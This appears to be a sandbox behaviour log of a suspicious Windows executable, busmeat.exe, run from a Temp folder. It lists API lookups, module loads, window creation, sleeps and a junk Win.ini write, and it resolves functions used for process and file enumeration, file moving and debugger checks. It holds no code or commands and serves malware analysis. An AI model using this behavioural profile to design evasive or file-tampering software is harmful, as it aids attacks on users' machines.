Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77c99dc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x7768a550 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x776b0a40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x76aa0790 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x7768f8a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x7768fa30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x776b1030 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x7768a000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x776b14b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x7768a4f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x776b16f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x77689970 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x76a23c90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x77688710 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\ciihmn~1\appdata\local\temp\busmeat.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe, size = 260 True 1
Fn
Module Map process_name = c:\users\ciihmn~1\appdata\local\temp\busmeat.exe False 249
Fn
Ini Write Section file_name_orig = Win.ini, section_name = Vibibozuve mayu, data = Xejili zuyo wi jufebodoyi True 249
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x7768d8d0 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x77670000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x77688b70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x77688c50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x77688c70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x77689fe0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7768fbc0 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x77670000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x77682da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x77696110 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x776892b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x776877b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x77689560 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x77696180 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x77ca2570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x77682db0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x77687940 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x776974f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x77689640 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x77695f20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x77681d90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x7768a2a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x7768d8d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x77682d80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x7768fcb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x77689700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x77696920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x77696540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x77688c50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x776896e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x776b26a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x77696870 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x77696860 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x776962a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x7768a3c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x77682af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x77681b90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77c9f190 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77c9a200 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x77689fa0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x77682d60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x776875a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x77687910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x7768a060 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x77696390 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77c99920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x7768a080 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x7768a040 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x77696590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x77682dc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x77682b90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x7768a3b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x7768a0f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x7768a790 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x77689680 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x776b28e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x7768a2c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x77696020 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7768fbc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x77689a70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x77681ba0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x77681da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x77689930 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x77689660 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77c85e80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77c85e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x776825e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x7768a090 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x77688770 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7768fd10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x77689fc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x77687920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x776b1c30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77c7da90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77c7bae0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x776879b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77c94f40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x77689a40 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74d70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetFocus, address_out = 0x74da5240 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x74d838f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x74da3140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x74da50f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x74d855d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x74da3230 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x74d8b9d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x74d83e40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetForegroundWindow, address_out = 0x74d8df70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77cbcaa0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x74d88ee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x74d891c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x74da56f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x74da52a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = keybd_event, address_out = 0x74defcf0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x74d97020 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowTextW, address_out = 0x74d94580 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongW, address_out = 0x74d84e80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x74d81830 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x74d8bea0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetAncestor, address_out = 0x74da5840 True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x77c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlUnwind, address_out = 0x77c9aca0 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x74a50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x74a6c544 True 1
Fn
System Get Time type = System Time, time = 1627-02-01 00:38:26 (UTC) True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x77670000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x7768a330 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7768f400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x77687580 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x77689910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x77696030 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x77695f90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x77695ff0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x7768a5d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x7768a690 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x77c740f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x77c6d630 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x77c6ecf0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x77695720 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77c6e140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x77c6eb60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77ca9990 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77ca5540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77c99dc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x7768a550 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x776b0a40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x76aa0790 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x7768f8a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x7768fa30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x776b1030 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x7768a000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x776b14b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x7768a4f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x776b16f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x77689970 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x76a23c90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x77688710 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\ciihmn~1\appdata\local\temp\busmeat.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe, size = 260 True 1
Fn
Module Get Filename process_name = c:\users\ciihmn~1\appdata\local\temp\busmeat.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe, size = 256 True 2
Fn
System Sleep duration = 200 milliseconds (0.200 seconds) True 1
Fn
Module Get Handle module_name = c:\users\ciihmn~1\appdata\local\temp\busmeat.exe, base_address = 0x400000 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74d70000 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77c40000 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74d70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsMenu, address_out = 0x74d902a0 True 1
Fn
Window Set Attribute index = 0, new_long = 825373492 False 1
Fn
Window Create class_name = ExtraWnd1, wndproc_parameter = 0 True 1
Fn
Window Create class_name = ExtraWnd2, wndproc_parameter = 0 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 6
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x77670000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x776877b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7768fbc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerifyVersionInfoW, address_out = 0x77687960 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x776960f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77c99920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x776887c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x7768c8c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x7768a510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleInformation, address_out = 0x77695f50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x7768efc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x77682d60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x77680570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x7768ee30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x7768c9b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x77697510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77c85e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x77695f20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x77696250 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x77696340 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x776878d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x7768a770 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x776961d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x77696290 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x77696510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x7768a410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x77693e90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x7768fcb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x77694cc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x77696450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x7768d8d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x77689a90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x776892b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77c995f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x77696110 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerSetConditionMask, address_out = 0x77c953c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x77696300 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x776ad320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x77689680 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x77687540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x776891e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x77682d80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x77ca2570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x77696180 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x77689560 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x77696590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x77689660 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x776894b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x77688c10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x77696360 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x77689540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x7768e320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x77689640 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x77688b70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x77687940 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x77687910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x776825e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x77695fe0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x776ad410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x77682db0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x77696540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x77688840 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x77693a70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x77696420 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MulDiv, address_out = 0x77695db0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x77689600 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x776957f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x776964a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x77687610 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x77688c70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceW, address_out = 0x776962e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x77689700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x77682da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77c7da90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x77693a30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77c85e80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x776974f0 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74d70000 True 1
Fn
